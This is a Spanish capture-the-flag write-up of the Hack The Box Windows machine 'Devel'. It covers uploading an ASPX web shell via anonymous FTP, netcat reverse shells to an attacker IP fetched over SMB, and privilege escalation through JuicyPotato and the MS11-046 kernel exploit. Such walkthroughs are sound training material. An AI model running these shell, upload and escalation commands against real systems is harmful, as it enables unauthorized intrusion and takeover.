Devel
Skills
- Abusing FTP + IIS Services
- Microsoft Windows (x86) – ‘afd.sys’ (MS11-046) [Privilege Escalation]
- Abusing SeImpersonatePrivilege (x86) - Juicy Potato [Privilege Escalation]
Certificaciones
- eJPT
- OSCP
Descripción
Devel es una máquina easy windows, nos autenticamos en el FTP con el usuario anonymous, subimos un archivo .aspx para ejecutar comandos. Gracias a este RCE (Remote Command Execution) nos mandamos una shell a nuestro equipo, una vez dentro explotamos el SeImpersonatePrivilege y ejecutamos un exploit de kernel, ambos nos garantizan una escalada de privilegios
Reconocimiento
Se comprueba que la máquina está activa y se determina su sistema operativo, el ttl de las máquinas windows suele ser 128, en este caso hay un nodo intermediario que hace que el ttl disminuya en una unidad
1
2
3
4
5
6
7
8
# ping 10.129.155.162
PING 10.129.155.162 (10.129.155.162) 56(84) bytes of data.
64 bytes from 10.129.155.162: icmp_seq=1 ttl=127 time=59.6 ms
64 bytes from 10.129.155.162: icmp_seq=2 ttl=127 time=108 ms
^C
--- 10.129.155.162 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 59.557/83.531/107.506/23.974 ms
Nmap
Se va a realizar un escaneo de todos los puertos abiertos en el protocolo TCP a través de nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# sudo nmap -p- --open --min-rate 5000 -sS -n -Pn -v 10.129.155.162 -oN openPorts
[sudo] password for justice-reaper:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-28 02:32 CEST
Initiating SYN Stealth Scan at 02:32
Scanning 10.129.155.162 [65535 ports]
Discovered open port 21/tcp on 10.129.155.162
Discovered open port 80/tcp on 10.129.155.162
Completed SYN Stealth Scan at 02:32, 26.68s elapsed (65535 total ports)
Nmap scan report for 10.129.155.162
Host is up (0.095s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 26.74 seconds
Raw packets sent: 131087 (5.768MB) | Rcvd: 41 (2.657KB)
Se procede a realizar un análisis de detección de servicios y la identificación de versiones utilizando los puertos abiertos encontrados
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
# nmap -sCV -p 21,80 10.129.155.162 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-28 02:40 CEST
Nmap scan report for 10.129.155.162
Host is up (0.074s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.90 seconds
FTP Enumeration
Como hay un IIS al conectarnos por FTP podemos ver las rutas del IIS, por lo tanto si podemos subir un archivo con extensión .asp o .aspx probablemente obtengamos ejecución remota de comandos
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
# ftp 10.129.155.162
Connected to 10.129.155.162.
220 Microsoft FTP Service
Name (10.129.155.162:justice-reaper): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls -a
229 Entering Extended Passive Mode (|||49176|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> aspnet_client
03-17-17 05:37PM 689 iisstart.htm
03-17-17 05:37PM 184946 welcome.png
226 Transfer complete.
ftp> cd aspnet_client
250 CWD command successful.
ftp> ls -a
229 Entering Extended Passive Mode (|||49178|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> ls -a
229 Entering Extended Passive Mode (|||49180|)
125 Data connection already open; Transfer starting.
03-18-17 02:06AM <DIR> 2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> ls -a
229 Entering Extended Passive Mode (|||49182|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
Abusing FTP
Localizamos cmdasp y copiamos estos archivos en nuestro directorio actual de trabajo desde el cual nos vamos a conectar por FTP
1
2
3
4
5
6
# locate cmdasp
/usr/share/webshells/asp/cmdasp.asp
/usr/share/webshells/aspx/cmdasp.aspx
# cp /usr/share/webshells/asp/cmdasp.asp .
# cp /usr/share/webshells/aspx/cmdasp.aspx .
Subimos el archivo cmdasp.aspx por FTP, he probado a subirlo en los demás directorios pero solo me deja en este, además he usado al final el archivo .aspx debido a que el .asp no me lo interpreta
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# ftp 10.129.155.162
Connected to 10.129.155.162.
220 Microsoft FTP Service
Name (10.129.155.162:justice-reaper): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
229 Entering Extended Passive Mode (|||49200|)
125 Data connection already open; Transfer starting.
100% |******************************************************************************************************************************************| 1442 17.62 MiB/s --:-- ETA
226 Transfer complete.
1442 bytes sent in 00:00 (6.36 KiB/s)
Web Exploitation
Al acceder al http://10.129.155.162/cmdasp.aspx probamos a ejecutar comandos y funciona
Intrusión
Nos copiamos nc.exe a nuestro directorio actual de trabajo
1
2
3
4
5
# locate nc.exe
/usr/share/seclists/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
# cp /usr/share/seclists/Web-Shells/FuzzDB/nc.exe .
Nos montamos un servidor smb en nuestro directorio actual
1
# impacket-smbserver smbFolder $(pwd) -smb2support
Nos ponemos en escucha por el puerto 9993 con netcat
1
# nc -nlvp 9993
Desde la web ejecutamos este payload
1
\\10.10.16.16\\smbFolder\nc.exe -e cmd 10.10.16.16 9993
Ganamos acceso a la máquina víctima
1
2
3
4
5
6
7
8
9
# nc -nlvp 9993
listening on [any] 9993 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.155.162] 49202
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
Privilege Escalation (First Method)
Listamos nuestros privilegios actuales y vemos que SeImpersonatePrivilege está activado por lo tanto podemos convertirnos en el usuario Administrator
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Listamos la información del sistema, para verificar si podemos utilizar JuicyPotato para convertirnos en Administrator o debemos usar una herramienta alternativas
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 28/7/2024, 3:30:22 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.347 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.425 MB
Virtual Memory: In Use: 716 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.155.162
[02]: fe80::11b7:e738:3f31:b822
[03]: dead:beef::d120:907d:57ca:f12f
[04]: dead:beef::11b7:e738:3f31:b822
Nos descargamos el .exe en nuestro equipo https://github.com/ivanitlearning/Juicy-Potato-x86/releases. En esta web https://ohpe.it/juicy-potato/CLSID/Windows_7_Enterprise/ podemos consultar los CLSID disponibles para nuestra versión, que es Windows 7 Enterprise, si uno no funciona debemos probar otro. Nos transferimos el nc.exe y el JuicyPotato.exe a la máquina víctima, para ello nos debemos montar un servidor smb primero en el mismo directorio donde se encuentran estos archivos
1
# impacket-smbserver smbFolder $(pwd) -smb2support
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
c:\Windows\Temp\privesc>copy \\10.10.16.16\smbFolder\JuicyPotato.exe .
copy \\10.10.16.16\smbFolder\JuicyPotato.exe .
1 file(s) copied.
c:\Windows\Temp\privesc>copy \\10.10.16.16\smbFolder\nc.exe .
copy \\10.10.16.16\smbFolder\nc.exe .
1 file(s) copied.
c:\Windows\Temp\privesc>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971
Directory of c:\Windows\Temp\privesc
28/07/2024 04:15 �� <DIR> .
28/07/2024 04:15 �� <DIR> ..
28/07/2024 04:11 �� 347.648 JuicyPotato.exe
28/07/2024 04:13 �� 28.160 nc.exe
2 File(s) 375.808 bytes
2 Dir(s) 4.641.300.480 bytes free
Nos ponemos en escucha con netcat por el puerto 9001
1
# nc nlvp 9001
Ejecutamos el JuicyPotato en la máquina víctima
1
2
3
4
5
6
7
8
9
10
Juicy.Potato.x86.exe -l 1337 -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" -p C:\Windows\System32\cmd.exe -a "/c C:\Windows\Temp\privesc\nc.exe -e cmd.exe 10.10.16.16 9001" -t *
Juicy.Potato.x86.exe -l 1337 -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" -p C:\Windows\System32\cmd.exe -a "/c C:\Windows\Temp\privesc\nc.exe -e cmd.exe 10.10.16.16 9001" -t *
Testing {9B1F122C-2982-4e91-AA8B-E071D54F2A4D} 1337
......
[+] authresult 0
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
c:\Windows\Temp\privesc>
Nos convertimos en el usuario Administrator
1
2
3
4
5
6
7
8
9
# nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.16.16] from (UNKNOWN) [10.129.155.162] 49214
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Privilege Escalation (Second Method)
Listamos los privilegios del sistema
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31 ��
System Boot Time: 28/7/2024, 3:30:22 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2595 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 3.071 MB
Available Physical Memory: 2.347 MB
Virtual Memory: Max Size: 6.141 MB
Virtual Memory: Available: 5.425 MB
Virtual Memory: In Use: 716 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.155.162
[02]: fe80::11b7:e738:3f31:b822
[03]: dead:beef::d120:907d:57ca:f12f
[04]: dead:beef::11b7:e738:3f31:b822
La versión del sistema operativo OS Version: 6.1.7600 N/A Build 7600 es vulnerable al parecer, he estado investigando y he encontrado este exploit https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS11-046/ms11-046.exe. Para transferirlo a la máquina víctima nos montar un servidor SMB en el mismo directorio del exploit
1
# impacket-smbserver smbFolder $(pwd) -smb2support
Nos descargamos el binario en la máquina víctima
1
2
3
C:\Windows\Temp\privesc>copy \\10.10.16.16\smbFolder\ms11-046.exe
copy \\10.10.16.16\smbFolder\ms11-046.exe
1 file(s) copied.
Ejecutamos el exploit y nos convertimos en nt authority\system
1
2
3
4
5
6
7
8
9
10
C:\Windows\Temp\privesc>copy \\10.10.16.16\smbFolder\ms11-046.exe
copy \\10.10.16.16\smbFolder\ms11-046.exe
1 file(s) copied.
C:\Windows\Temp\privesc>ms11-046.exe
ms11-046.exe
c:\Windows\System32>whoami
whoami
nt authority\system